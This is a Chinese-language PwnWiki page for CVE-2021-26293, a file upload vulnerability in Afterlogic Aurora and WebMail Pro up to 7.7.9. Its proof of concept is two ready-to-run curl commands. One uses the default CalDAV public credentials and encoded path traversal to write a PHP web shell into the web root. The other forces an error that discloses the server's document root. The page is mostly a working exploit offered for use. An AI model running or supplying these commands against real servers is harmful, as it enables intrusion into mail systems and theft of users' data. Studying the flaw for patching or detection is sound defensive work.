CVE-2021-26293 Afterlogic Aurora & WebMail Pro 文件上傳漏洞

From PwnWiki
Revision as of 10:48, 22 May 2021 by Pwnwiki (talk | contribs) (Created page with "==影響版本== <pre> WebMail Pro ≤ 7.7.9 Afterlogic Aurora ≤ 7.7.9 </pre> ==POC== <pre> curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

影響版本

WebMail Pro ≤ 7.7.9
Afterlogic Aurora ≤ 7.7.9

POC

curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"

默認路徑為/var/www/html,也可能更改配置為其它路徑,可以嘗試其它方式獲取。 

curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-26293_Afterlogic_Aurora_%26_WebMail_Pro_文件上傳漏洞&oldid=3050"